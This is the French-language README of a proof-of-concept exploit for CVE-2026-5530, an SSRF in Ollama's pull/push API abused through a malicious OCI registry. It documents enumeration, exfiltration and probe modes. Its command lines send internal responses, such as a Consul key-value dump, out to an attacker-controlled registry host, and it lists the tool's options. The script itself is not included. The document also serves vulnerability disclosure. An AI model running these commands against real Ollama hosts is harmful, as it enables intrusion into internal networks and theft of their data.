
Preuve de concept d'exploitation pour CVE-2026-5530, une SSRF dans l'API Pull/Push d'Ollama, permettant l'énumération de points de terminaison internes et l'exfiltration complète des réponses via un registre OCI malveillant.
SSRF dans Ollama via redirection de registre OCI avec exfiltration complète de la réponse.
Article : https://davidrochester.com/posts/cve-2026-5530
Ollama a été contacté à plusieurs reprises sans réponse.
Trois modes : enum, exfil et probe.
Détecte les points de terminaison internes actifs accessibles depuis l'hôte Ollama.
python3 poc.py targets.txt --registry-host <votre-ip>
Exfiltre les réponses SSRF lorsque vous connaissez la taille de la réponse.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <votre-ip>
Recherche binaire automatique de la taille de la réponse, puis exfiltration.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <votre-ip>
target URL ou fichier d'URL (une par ligne, # pour les commentaires)
-p, --port port du registre malveillant (défaut : 9999)
--exfil-port port du registre d'exfiltration (défaut : 10000)
--exfil mode exfiltration, nécessite --size
--probe recherche binaire de la taille, puis exfiltration
--size Content-Length (requis avec --exfil)
--registry-host votre IP/nom d'hôte attaquant que Ollama peut atteindre
--ollama URL de l'API Ollama (défaut : http://127.0.0.1:11434)